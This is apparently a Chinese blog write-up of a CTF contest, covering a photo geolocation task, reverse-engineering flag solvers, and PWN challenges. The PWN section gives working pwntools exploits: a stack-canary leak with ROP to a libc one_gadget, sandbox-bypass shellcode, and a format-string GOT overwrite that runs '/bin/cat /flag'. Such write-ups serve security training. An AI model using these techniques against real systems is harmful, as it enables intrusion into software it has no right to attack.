<figure class="highlight mipsasm"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><code class="hljs mipsasm">　山手本通りの「イタリア山庭園前」バス停辺りから北北西を見ると、みなとみらい地区が真近に見える。<span class="hljs-keyword">JR根岸線では桜木町が最寄り駅である。今日は保土ヶ谷駅東口から山手ライナーと呼ばれる神奈中バスの路線バスに乗車し、山手町で降車した。山手ライナーの終点は桜木町駅である。しかし、その終点が本当に真近に見える。</span><br><span class="hljs-keyword"></span><br>从山手本通上的“意大利山庭园前”公交站附近向北北西方向望去，可以看到横滨港未来地区近在咫尺。<span class="hljs-keyword">JR </span>根岸线最近的站点是樱木町。今天我从保土谷站东口乘坐被称为山手 Liner 的神奈中巴士路线巴士，在山手町下车。山手 Liner 的终点站是樱木町站。然而，那个终点站真的近在眼前。<br></code></pre></td></tr></table></figure>

<p>根据图片，是在红绿灯附近，找イタリア山庭園前 公交站附近的红绿灯</p>
<p><img src="/2024/10/06/longyuctfwp/image-20241005142422457.png" srcset="/img/loading.gif" lazyload alt="image-20241005142422457"></p>
<p>就是这里：</p>
<p>35.435,139.645</p>
<h1 id="Reverse"><a href="#Reverse" class="headerlink" title="Reverse"></a>Reverse</h1><h2 id="pyc"><a href="#pyc" class="headerlink" title="pyc"></a>pyc</h2><p>pyinstaller的图标，先提取代码，里面有1.pyc</p>
<p>然后对1.pyc反编译。</p>
<p>拿到代码逻辑之后，爆破flag字符即可</p>
<p>exp</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br></pre></td><td class="code"><pre><code class="hljs python"><span class="hljs-keyword">import</span> string<br><br><span class="hljs-keyword">def</span> <span class="hljs-title function_">check</span>():<br>    a = <span class="hljs-built_in">input</span>(<span class="hljs-string">&quot;plz input your flag:&quot;</span>)<br>    c = [<span class="hljs-number">144</span>, <span class="hljs-number">163</span>, <span class="hljs-number">158</span>, <span class="hljs-number">177</span>, <span class="hljs-number">121</span>, <span class="hljs-number">39</span>, <span class="hljs-number">58</span>, <span class="hljs-number">58</span>, <span class="hljs-number">91</span>, <span class="hljs-number">111</span>, <span class="hljs-number">25</span>, <span class="hljs-number">158</span>, <span class="hljs-number">72</span>, <span class="hljs-number">53</span>, <span class="hljs-number">152</span>,<br>     <span class="hljs-number">78</span>, <span class="hljs-number">171</span>, <span class="hljs-number">12</span>, <span class="hljs-number">53</span>, <span class="hljs-number">105</span>, <span class="hljs-number">45</span>, <span class="hljs-number">12</span>, <span class="hljs-number">12</span>, <span class="hljs-number">53</span>, <span class="hljs-number">12</span>, <span class="hljs-number">171</span>, <span class="hljs-number">111</span>, <span class="hljs-number">91</span>, <span class="hljs-number">53</span>,<br>     <span class="hljs-number">152</span>, <span class="hljs-number">105</span>, <span class="hljs-number">45</span>, <span class="hljs-number">152</span>, <span class="hljs-number">144</span>, <span class="hljs-number">39</span>, <span class="hljs-number">171</span>, <span class="hljs-number">45</span>, <span class="hljs-number">91</span>, <span class="hljs-number">78</span>, <span class="hljs-number">45</span>, <span class="hljs-number">158</span>, <span class="hljs-number">8</span>]<br>    b = <span class="hljs-number">179</span><br>    <span class="hljs-comment"># dsd</span><br>    a = string.printable<br>    <span class="hljs-comment"># dssd</span><br>    <span class="hljs-keyword">for</span> j <span class="hljs-keyword">in</span> <span class="hljs-built_in">range</span>(<span class="hljs-number">42</span>):<br>        <span class="hljs-keyword">for</span> i <span class="hljs-keyword">in</span> <span class="hljs-built_in">range</span>(<span class="hljs-built_in">len</span>(a)):<br>            <span class="hljs-keyword">if</span> <span class="hljs-built_in">ord</span>(a[i]) * <span class="hljs-number">33</span> % b == c[j]:<br>                <span class="hljs-built_in">print</span>(a[i],end=<span class="hljs-string">&quot;&quot;</span>)<br><br>    <span class="hljs-comment"># print(&quot;win&quot;)</span><br><br><br>check()<br></code></pre></td></tr></table></figure>

<h2 id="jeb"><a href="#jeb" class="headerlink" title="jeb"></a>jeb</h2><p>拿到代码之后，手写一个java执行获取flag即可</p>
<p>exp</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br></pre></td><td class="code"><pre><code class="hljs python"><span class="hljs-keyword">import</span> java.security.MessageDigest;<br><span class="hljs-keyword">import</span> java.security.NoSuchAlgorithmException;<br><br><br>public <span class="hljs-keyword">class</span> <span class="hljs-title class_">Main</span> &#123;<br>	public static void main(String[] args) &#123;<br>	    String userName = <span class="hljs-string">&quot;Tenshine&quot;</span>;<br>	    <span class="hljs-keyword">try</span> &#123;<br>	        MessageDigest digest = MessageDigest.getInstance(<span class="hljs-string">&quot;MD5&quot;</span>);<br>            digest.reset();<br>            digest.update(userName.getBytes());<br>            byte[] <span class="hljs-built_in">bytes</span> = digest.digest();<br>            String hexstr = toHexString(<span class="hljs-built_in">bytes</span>, <span class="hljs-string">&quot;&quot;</span>);<br>            StringBuilder sb = new StringBuilder();<br>            <span class="hljs-keyword">for</span> (<span class="hljs-built_in">int</span> i = <span class="hljs-number">0</span>; i &lt; hexstr.length(); i += <span class="hljs-number">2</span>) &#123;<br>                sb.append(hexstr.charAt(i));<br>            &#125;<br>            String userSN = sb.toString();<br>            String bbb = new StringBuilder().append(<span class="hljs-string">&quot;flag&#123;&quot;</span>).append(userSN).append(<span class="hljs-string">&quot;&#125;&quot;</span>).toString();<br>    <br>    		System.out.println(bbb);<br>	    &#125; catch(Exception e) &#123;<br>	    &#125;<br>	    <br>	&#125;<br>	<br>	private static String toHexString(byte[] <span class="hljs-built_in">bytes</span>, String separator) &#123;<br>        StringBuilder hexString = new StringBuilder();<br>        <span class="hljs-keyword">for</span> (byte b : <span class="hljs-built_in">bytes</span>) &#123;<br>            String <span class="hljs-built_in">hex</span> = Integer.toHexString(b &amp; <span class="hljs-number">255</span>);<br>            <span class="hljs-keyword">if</span> (<span class="hljs-built_in">hex</span>.length() == <span class="hljs-number">1</span>) &#123;<br>                hexString.append(<span class="hljs-string">&#x27;0&#x27;</span>);<br>            &#125;<br>            hexString.append(<span class="hljs-built_in">hex</span>).append(separator);<br>        &#125;<br>        <span class="hljs-keyword">return</span> hexString.toString();<br>    &#125;<br><br>&#125;<br><span class="hljs-comment"># flag&#123;bc72f242a6af3857&#125;</span><br></code></pre></td></tr></table></figure>

<h2 id="re1"><a href="#re1" class="headerlink" title="re1"></a>re1</h2><p>ida打开即有flag</p>
<h2 id="百度一下，你就知道！"><a href="#百度一下，你就知道！" class="headerlink" title="百度一下，你就知道！"></a>百度一下，你就知道！</h2><p>style.css里面有aes</p>
<p><img src="/2024/10/06/longyuctfwp/image-20241002123832055.png" srcset="/img/loading.gif" lazyload alt="image-20241002123832055"></p>
<p>拿到密码</p>
<p>the_ultimate_password123</p>
<p>验证密码，下载文件：<a target="_blank" rel="noopener" href="http://ctf.54cto.com:50062/password_checker_ZwXcLxTM.php">http://ctf.54cto.com:50062/password_checker_ZwXcLxTM.php</a></p>
<p>下载完进行upx -d，需要下载最新版才可以。</p>
<p>main函数有问题，第一个字节其实被换成retn了，本来应该是push ebp的，但是其实不影响分析showflag函数。</p>
<p>解密完分析showflag函数内容。</p>
<p>然后写exp：</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br></pre></td><td class="code"><pre><code class="hljs python"><span class="hljs-comment">#!/bin/python3</span><br><span class="hljs-keyword">import</span> string<br>l = string.printable<br><br><span class="hljs-keyword">def</span> <span class="hljs-title function_">showflag</span>(<span class="hljs-params">l</span>):<br>    v3 = <span class="hljs-string">&quot;666E6567837a6D7A736A5F7D6F858A5F868990897D00&quot;</span><br>    v3_bytes = <span class="hljs-built_in">bytearray</span>().fromhex(v3)<br>    <span class="hljs-built_in">print</span>(v3_bytes)<br>    <span class="hljs-comment"># 检查输入字符串是否符合条件</span><br>    <span class="hljs-keyword">for</span> i <span class="hljs-keyword">in</span> <span class="hljs-built_in">range</span>(<span class="hljs-number">21</span>):<br>        <span class="hljs-keyword">for</span> ll <span class="hljs-keyword">in</span> l:<br>            <span class="hljs-keyword">if</span> i + (i ^ <span class="hljs-built_in">ord</span>(ll)) == v3_bytes[i]:<br>                <span class="hljs-built_in">print</span>(ll,end=<span class="hljs-string">&quot;&quot;</span>)<br>showflag(l)<br></code></pre></td></tr></table></figure>

<h1 id="PWN"><a href="#PWN" class="headerlink" title="PWN"></a>PWN</h1><h2 id="pwn签到"><a href="#pwn签到" class="headerlink" title="pwn签到"></a>pwn签到</h2><p>题目描述：无</p>
<p>exp</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br></pre></td><td class="code"><pre><code class="hljs python"><span class="hljs-keyword">from</span> pwn <span class="hljs-keyword">import</span> *<br>io = remote(<span class="hljs-string">&#x27;ctf.54cto.com&#x27;</span>, <span class="hljs-number">50267</span>)<br>elf = ELF(<span class="hljs-string">&#x27;./signin&#x27;</span>)<br><br>libc = ELF(<span class="hljs-string">&#x27;./libc-2.27.so&#x27;</span>)<br>one_gadget = <span class="hljs-number">0x4f302</span><br><br><br><br>puts_got = elf.got[<span class="hljs-string">&#x27;puts&#x27;</span>]<br>puts_plt = elf.plt[<span class="hljs-string">&#x27;puts&#x27;</span>]<br>rdi_ret = <span class="hljs-number">0x40071E</span><br>start_addr = <span class="hljs-number">0x400620</span><br><br><span class="hljs-built_in">print</span>(<span class="hljs-string">&quot;========name========&quot;</span>)<br>io.sendlineafter(<span class="hljs-string">b&quot;name: &quot;</span>, <span class="hljs-string">b&quot;jesen&quot;</span>)<br>io.recvuntil(<span class="hljs-string">b&quot;yourself: &quot;</span>)<br><span class="hljs-built_in">print</span>(<span class="hljs-string">&quot;========yourself========&quot;</span>)<br>payload = <span class="hljs-string">b&quot;a&quot;</span> * <span class="hljs-number">24</span><br>io.sendline(payload)<br>io.recvuntil(<span class="hljs-string">b&quot;a&quot;</span> * <span class="hljs-number">24</span>)<br><span class="hljs-comment">#io.interactive()</span><br><span class="hljs-built_in">print</span>(<span class="hljs-string">&quot;========leak canary========&quot;</span>)<br>canary = u64(io.recv(<span class="hljs-number">8</span>)) - <span class="hljs-number">0x0a</span><br><span class="hljs-built_in">print</span>(<span class="hljs-string">&quot;canary=&gt;&quot;</span> +<span class="hljs-built_in">hex</span>(canary))<br>a = io.recvuntil(<span class="hljs-string">b&quot;ing: &quot;</span>)<br><span class="hljs-built_in">print</span>(<span class="hljs-string">&quot;something:&quot;</span>,a)<br><span class="hljs-comment">#&quot;========leak libc_base========&quot;</span><br>payload = <span class="hljs-string">b&quot;a&quot;</span> * (<span class="hljs-number">0x20</span>-<span class="hljs-number">8</span>) + p64(canary) + <span class="hljs-string">b&quot;a&quot;</span> * <span class="hljs-number">8</span> + p64(rdi_ret) + p64(puts_got) + p64(puts_plt) + p64(start_addr)<br>io.sendline(payload)<br><span class="hljs-comment">#a = io.recv()</span><br><span class="hljs-comment">#print(a)</span><br>puts_addr = u64(io.recv(<span class="hljs-number">8</span>).ljust(<span class="hljs-number">8</span>, <span class="hljs-string">b&#x27;\x00&#x27;</span>))<br><span class="hljs-built_in">print</span> (<span class="hljs-string">&quot;puts_addr=&gt;&quot;</span> +<span class="hljs-built_in">hex</span>(puts_addr))<br>libc_base = puts_addr - libc.symbols[<span class="hljs-string">&#x27;puts&#x27;</span>]<br>one_gadget = libc_base + one_gadget<br><br>io.sendlineafter(<span class="hljs-string">b&quot;name: &quot;</span>, <span class="hljs-string">b&quot;jesen&quot;</span>)<br>io.recvuntil(<span class="hljs-string">b&quot;yourself: &quot;</span>)<br>payload = <span class="hljs-string">b&quot;a&quot;</span> * <span class="hljs-number">24</span><br>io.sendline(payload)<br>io.recvuntil(<span class="hljs-string">b&quot;a&quot;</span> * <span class="hljs-number">24</span>)<br><span class="hljs-comment">#io.interactive()</span><br><span class="hljs-built_in">print</span>(<span class="hljs-string">&quot;========leak canary========&quot;</span>)<br>canary = u64(io.recv(<span class="hljs-number">8</span>)) - <span class="hljs-number">0x0a</span><br><span class="hljs-built_in">print</span>(<span class="hljs-string">&quot;canary=&gt;&quot;</span> +<span class="hljs-built_in">hex</span>(canary))<br>a = io.recvuntil(<span class="hljs-string">b&quot;ing: &quot;</span>)<br>payload2=<span class="hljs-string">b&quot;a&quot;</span> * <span class="hljs-number">24</span> + p64(canary) + <span class="hljs-string">b&quot;a&quot;</span> * <span class="hljs-number">8</span> + p64(one_gadget)<br>io.sendline(payload2)<br>io.interactive()<br></code></pre></td></tr></table></figure>

<h2 id="sandbox"><a href="#sandbox" class="headerlink" title="sandbox"></a>sandbox</h2><p>题目描述：不能execve怎么办? ——vrtua</p>
<p>沙箱，禁用了execve和orw</p>
<p>那么替代品：openat，mmap，writev</p>
<p>在网上随便找个shellcode用就行了。</p>
<p>exp：</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br></pre></td><td class="code"><pre><code class="hljs python"><span class="hljs-keyword">from</span> pwn <span class="hljs-keyword">import</span> *<br>p = remote(<span class="hljs-string">&#x27;ctf.54cto.com&#x27;</span>, <span class="hljs-number">50350</span>)<br><span class="hljs-comment">#https://blog.csdn.net/llovewuzhengzi/article/details/140205290</span><br>context(log_level = <span class="hljs-string">&#x27;info&#x27;</span>,arch = <span class="hljs-string">&#x27;amd64&#x27;</span>)<br>shellcode = <span class="hljs-string">&#x27;&#x27;&#x27;mov eax,0 &#x27;&#x27;&#x27;</span><br>shellcode+=<span class="hljs-string">&#x27;&#x27;&#x27;</span><br><span class="hljs-string">mov rdi,0</span><br><span class="hljs-string">mov rsi,0x10</span><br><span class="hljs-string">mov rdx,3</span><br><span class="hljs-string">mov r10,0x22</span><br><span class="hljs-string">mov r8,0xffffffff</span><br><span class="hljs-string">mov r9,0</span><br><span class="hljs-string">mov rax,0x9</span><br><span class="hljs-string">syscall</span><br><span class="hljs-string">mov rsp,rax</span><br><span class="hljs-string">add rsp,24</span><br><span class="hljs-string">push 0x67616c66</span><br><span class="hljs-string"></span><br><span class="hljs-string">mov edi, 0xffffff9c</span><br><span class="hljs-string">mov    rsi, rsp</span><br><span class="hljs-string">xor    edx,edx</span><br><span class="hljs-string">xor    eax,eax</span><br><span class="hljs-string">mov    ax,0x101</span><br><span class="hljs-string">syscall </span><br><span class="hljs-string">mov rdi,0</span><br><span class="hljs-string">mov rsi,0x100</span><br><span class="hljs-string">mov rdx,1</span><br><span class="hljs-string">mov r10,1</span><br><span class="hljs-string">mov r8,3</span><br><span class="hljs-string">mov r9,0</span><br><span class="hljs-string">mov rax,0x9</span><br><span class="hljs-string">syscall</span><br><span class="hljs-string"></span><br><span class="hljs-string">push 0x40</span><br><span class="hljs-string">push rax</span><br><span class="hljs-string">mov rdi,0x1</span><br><span class="hljs-string">mov rsi,rsp</span><br><span class="hljs-string">mov rdx,1</span><br><span class="hljs-string">mov rax,0x14</span><br><span class="hljs-string">syscall</span><br><span class="hljs-string">&#x27;&#x27;&#x27;</span><br>payload=asm(shellcode)<br>p.sendline(payload)<br>a = p.recvuntil(<span class="hljs-string">b&quot;&#125;&quot;</span>)<br><span class="hljs-built_in">print</span>(a)<br></code></pre></td></tr></table></figure>

<h2 id="真·签到"><a href="#真·签到" class="headerlink" title="真·签到"></a>真·签到</h2><p>题目描述：这是真正的签到，觉得眼熟吗？——vrtua</p>
<p>大概就是/bin/c?t /????</p>
<h2 id="ez-fmt"><a href="#ez-fmt" class="headerlink" title="ez_fmt"></a>ez_fmt</h2><p>题目描述：你真的会格式化字符串吗 —— vrtua</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br></pre></td><td class="code"><pre><code class="hljs python"><span class="hljs-keyword">from</span> pwn <span class="hljs-keyword">import</span> *<br><span class="hljs-comment">#获取偏移</span><br><span class="hljs-comment"># def exec_fmt(payload):</span><br>    <span class="hljs-comment"># io = remote(&#x27;ctf.54cto.com&#x27;, 50885)</span><br>    <span class="hljs-comment"># io.recvuntil(b&quot;string: \n&quot;)</span><br>    <span class="hljs-comment"># io.sendline(payload)</span><br>    <span class="hljs-comment"># info = io.recv()</span><br>    <span class="hljs-comment"># return info</span><br><span class="hljs-comment"># autofmt = FmtStr(exec_fmt)</span><br><span class="hljs-comment"># offset = autofmt.offset</span><br><span class="hljs-comment"># print(&quot;offset&quot;,&quot;=&quot;,offset)</span><br><span class="hljs-comment">#获取偏移</span><br>context(arch=<span class="hljs-string">&#x27;amd64&#x27;</span>, log_level=<span class="hljs-string">&#x27;info&#x27;</span>)<br>context(arch=<span class="hljs-string">&#x27;amd64&#x27;</span>)<br>elf = ELF(<span class="hljs-string">&#x27;./ez_fmt&#x27;</span>)<br>libc = ELF(<span class="hljs-string">&#x27;./libc-2.27.so&#x27;</span>)<br>main_addr = <span class="hljs-number">0x400657</span><br><span class="hljs-comment">#ld = ELF(&#x27;./ld-2.31.so&#x27;)</span><br>io = remote(<span class="hljs-string">&#x27;ctf.54cto.com&#x27;</span>, <span class="hljs-number">50885</span>)<br>io.recvuntil(<span class="hljs-string">b&quot;you: &quot;</span>)<br>read_addr = <span class="hljs-built_in">int</span>(io.recv(<span class="hljs-number">14</span>),<span class="hljs-number">16</span>)<br><span class="hljs-built_in">print</span>(<span class="hljs-string">&quot;========read addr========&quot;</span>)<br><br><span class="hljs-built_in">print</span>(<span class="hljs-string">&quot;read=&gt;&quot;</span> +<span class="hljs-built_in">hex</span>(read_addr))<br>libc_base = read_addr - libc.sym[<span class="hljs-string">&#x27;read&#x27;</span>]<br>exit_hook = elf.got[<span class="hljs-string">&#x27;exit&#x27;</span>]<br><span class="hljs-built_in">print</span>(<span class="hljs-string">&quot;exit=&gt;&quot;</span> +<span class="hljs-built_in">hex</span>(exit_hook))<br><span class="hljs-comment">#exit=&gt;main</span><br>io.recvuntil(<span class="hljs-string">b&quot;string: \n&quot;</span>)<br>payload = fmtstr_payload(<span class="hljs-number">8</span>,&#123;exit_hook:main_addr&#125;,write_size=<span class="hljs-string">&#x27;byte&#x27;</span>)<br>io.sendline(payload)<br><span class="hljs-comment">#printf =&gt; system</span><br>printf_addr = elf.got[<span class="hljs-string">&#x27;printf&#x27;</span>]<br>system_addr = libc_base + libc.sym[<span class="hljs-string">&#x27;system&#x27;</span>]<br>io.recvuntil(<span class="hljs-string">b&quot;string: \n&quot;</span>)<br>payload = fmtstr_payload(<span class="hljs-number">8</span>,&#123;printf_addr:system_addr&#125;,write_size=<span class="hljs-string">&#x27;byte&#x27;</span>)<br>io.sendline(payload)<br><span class="hljs-comment">#开始执行代码</span><br>io.recvuntil(<span class="hljs-string">b&quot;string: \n&quot;</span>)<br>io.sendline(<span class="hljs-string">b&quot;/bin/cat /flag&quot;</span>)<br><span class="hljs-built_in">print</span>(io.recv())<br>io.close()<br></code></pre></td></tr></table></figure>

<h2 id="babyheap"><a href="#babyheap" class="headerlink" title="babyheap"></a>babyheap</h2><p>题目描述：善良的出题人甚至留了backdoor在里面————vrtua</p>
<p>16.04</p>
<p>看出来突破口了，但是因为之前没怎么研究过pwn的堆相关东西，最终结束之前没做出来</p>
<p>libc地址可以考unsortedbin泄露</p>
<p>此外，size设为0的时候realloc可以当free用，然后利用uaf就可以。</p>
<p><img src="/2024/10/06/longyuctfwp/641fc1b2ab28565afd6c42537768514f.png" srcset="/img/loading.gif" lazyload alt="img"></p>
<h2 id="babyheap-revenge"><a href="#babyheap-revenge" class="headerlink" title="babyheap-revenge"></a>babyheap-revenge</h2><p>题目描述：经过上次的失败，开发者将程序进行了升级，这使它更加牢固（也可能更脆弱了）——vrtua</p>
<p>同上，但是没有后门，有佬打io，也有佬打atoi的got~</p>

            </div>
            <hr>
            <div>
              <div class="post-metas mb-3">
                
                  <div class="post-meta mr-3">
                    <i class="iconfont icon-category"></i>
                    
                      <a class="hover-with-bg" href="/categories/CTF/">CTF</a>
                    
                  </div>
                
                
                  <div class="post-meta">
                    <i class="iconfont icon-tags"></i>
                    
                      <a class="hover-with-bg" href="/tags/CTF/">CTF</a>
                    
                      <a class="hover-with-bg" href="/tags/Writeup/">Writeup</a>
                    
                  </div>
                
              </div>
              
                <p class="note note-warning">
                  
                    本博客所有文章除特别声明外，均采用 <a target="_blank" href="https://creativecommons.org/licenses/by-sa/4.0/deed.zh" rel="nofollow noopener noopener">CC BY-SA 4.0 协议</a> ，转载请注明出处！
                  
                </p>
              
              
                <div class="post-prevnext">
                  <article class="post-prev col-6">
                    
                    
                  </article>
                  <article class="post-next col-6">
                    
                    
                      <a href="/2024/01/02/blockchainmaster.html">
                        <span class="hidden-mobile">数字货币悟道记</span>
                        <span class="visible-mobile">Nächster</span>
                        <i class="iconfont icon-arrowright"></i>
                      </a>
                    
                  </article>
                </div>
              
            </div>

            
              <!-- Comments -->
              <article class="comments" id="comments" lazyload>
                
                  
                
                
  <div id="valine"></div>
  <script type="text/javascript">
    Fluid.utils.loadComments('#valine', function() {
      Fluid.utils.createScript('https://lf3-cdn-tos.bytecdntp.com/cdn/expire-1-M/valine/1.4.16/Valine.min.js', function() {
        var options = Object.assign(
          {"appId":"SDu2T9KUB8UY5eF5L3dfbdyt-gzGzoHsz","appKey":"Q4E9nvCrlFLKhPtPLwXlkkxb","path":"window.location.pathname","placeholder":null,"avatar":"retro","meta":["nick","mail","link"],"requiredFields":[],"pageSize":10,"lang":"zh-CN","highlight":false,"recordIP":true,"serverURLs":"","emojiCDN":null,"emojiMaps":null,"enableQQ":false},
          {
            el: "#valine",
            path: window.location.pathname
          }
        )
        new Valine(options);
        Fluid.utils.waitElementVisible('#valine .vcontent', () => {
          Fluid.plugins.initFancyBox('#valine .vcontent img:not(.vemoji)');
        })
      });
    });
  </script>
  <noscript>Please enable JavaScript to view the comments</noscript>


              </article>
            
          </article>
        </div>
      </div>
    </div>
    
      <div class="d-none d-lg-block col-lg-2 toc-container" id="toc-ctn">
        <div id="toc">
  <p class="toc-header"><i class="iconfont icon-list"></i>&nbsp;TOC</p>
  <div class="toc-body" id="toc-body"></div>
</div>

      </div>
    
  </div>
</div>

<!-- Custom -->


    

    
      <a id="scroll-top-button" aria-label="TOP" href="#" role="button">
        <i class="iconfont icon-arrowup" aria-hidden="true"></i>
      </a>
    

    
      <div class="modal fade" id="modalSearch" tabindex="-1" role="dialog" aria-labelledby="ModalLabel"
     aria-hidden="true">
  <div class="modal-dialog modal-dialog-scrollable modal-lg" role="document">
    <div class="modal-content">
      <div class="modal-header text-center">
        <h4 class="modal-title w-100 font-weight-bold">Suchen</h4>
        <button type="button" id="local-search-close" class="close" data-dismiss="modal" aria-label="Close">
          <span aria-hidden="true">&times;</span>
        </button>
      </div>
      <div class="modal-body mx-3">
        <div class="md-form mb-5">
          <input type="text" id="local-search-input" class="form-control validate">
          <label data-error="x" data-success="v"
                 for="local-search-input">Stichwort</label>
        </div>
        <div class="list-group" id="local-search-result"></div>
      </div>
    </div>
  </div>
</div>
    

    
  </main>

  <footer class="text-center mt-5 py-3">
  <div class="footer-content">
     <a href="https://hexo.io" target="_blank" rel="nofollow noopener"><span>Hexo</span></a> <i class="iconfont icon-love"></i> <a href="https://github.com/fluid-dev/hexo-theme-fluid" target="_blank" rel="nofollow noopener"><span>Fluid</span></a> 
  </div>
  

  
  <!-- 备案信息 -->
  <div class="beian">
    <span>
      <a href="http://beian.miit.gov.cn/" target="_blank" rel="nofollow noopener">
        蒙ICP备19004791号-1
      </a>
    </span>
    
  </div>


  
  <script>
      const registerSW = () => {
        if ("serviceWorker" in navigator) {
            navigator.serviceWorker.register("/sw.js" + location.search).then(reg => console.log("Service worker register succeeded"),
                error => console.error(`Service worker register failed: ${error}`))
        }
      };
      window.addEventListener("load", () => registerSW());
  </script>
</footer>


  <!-- SCRIPTS -->
  
  <script  src="https://lf6-cdn-tos.bytecdntp.com/cdn/expire-1-M/nprogress/0.2.0/nprogress.min.js" ></script>
  <link  rel="stylesheet" href="https://lf6-cdn-tos.bytecdntp.com/cdn/expire-1-M/nprogress/0.2.0/nprogress.min.css" />

  <script>
    NProgress.configure({"showSpinner":false,"trickleSpeed":100})
    NProgress.start()
    window.addEventListener('load', function() {
      NProgress.done();
    })
  </script>


<script  src="https://lf9-cdn-tos.bytecdntp.com/cdn/expire-1-M/jquery/3.6.0/jquery.min.js" ></script>
<script  src="https://lf3-cdn-tos.bytecdntp.com/cdn/expire-1-M/bootstrap/4.6.1/js/bootstrap.min.js" ></script>
<script  src="/js/events.js" ></script>
<script  src="/js/plugins.js" ></script>

<!-- Plugins -->


  <script  src="/js/local-search.js" ></script>



  
    <script  src="/js/img-lazyload.js" ></script>
  



  



  
    <script  src="https://lf9-cdn-tos.bytecdntp.com/cdn/expire-1-M/tocbot/4.18.2/tocbot.min.js" ></script>
  
  
    <script  src="https://lf26-cdn-tos.bytecdntp.com/cdn/expire-1-M/fancybox/3.5.7/jquery.fancybox.min.js" ></script>
  
  
    <script  src="https://lf3-cdn-tos.bytecdntp.com/cdn/expire-1-M/anchor-js/4.3.1/anchor.min.js" ></script>
  
  
    <script defer src="https://lf26-cdn-tos.bytecdntp.com/cdn/expire-1-M/clipboard.js/2.0.10/clipboard.min.js" ></script>
  




















<!-- 主题的启动项 保持在最底部 -->
<script  src="/js/boot.js" ></script>


</body>
</html>
